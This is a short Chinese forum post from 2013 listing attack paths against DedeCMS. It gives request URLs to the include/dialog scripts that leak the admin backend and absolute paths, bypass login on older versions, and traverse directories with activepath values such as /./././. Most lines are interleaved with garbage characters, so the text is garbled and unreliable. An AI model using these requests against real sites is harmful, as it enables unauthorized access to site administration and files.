1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理) t: L8 C8 u1 s6 _& l3 P0 K2 P
2 c& l( \( f! w: n; i2 e, t+ ^
员帐号,新版本的就直接转向了后台.6 y, f) R) v4 b/ S! i. a
# S/ |8 s) y* N# T8 y/ s2.include/dialog/config.php会爆出后台管理路径. V1 f+ G! z& n! A% {7 f4 j+ N
1 ]* K' U" ~3 L3 W5 e8 l
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
0 o0 o# B# _' f Z" p1 i& ^
1 ]# t' o4 C% G+ \3 L: M5 T3 h. E4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.2 g: ?! Z; @. `- t4 e- I( o; i4 e
, q* ^* o9 ]% J* N
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
9 E" E3 E3 |& s0 }6 E9 N- ?; ^, E; T
到根目录去.不过这些版本的访问地址有些不同.
) q9 ] L: @+ ~8 y# S地址为require/dialog/select_soft.php?activepath=/././././././././4 o: a. Y2 O1 n+ G
0 R% q: o5 e f7 q6 p G7 K
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
2 p2 f* P6 K, [1 w/ o, K存在相同问题的文件还有$ U2 d3 f/ F% E7 u- X
include\dialog\select_images.php
! |" D3 D( y6 A0 M) j- \, J5 _include\dialog\select_media.php
& B7 n# ^# ?0 H* v' f/ d: K8 Xinclude\dialog\select_templets.php7 c$ f* u; H9 L l( w: u7 y5 y
|
发表于 2013-4-16 16:50:43
收藏
支持
反对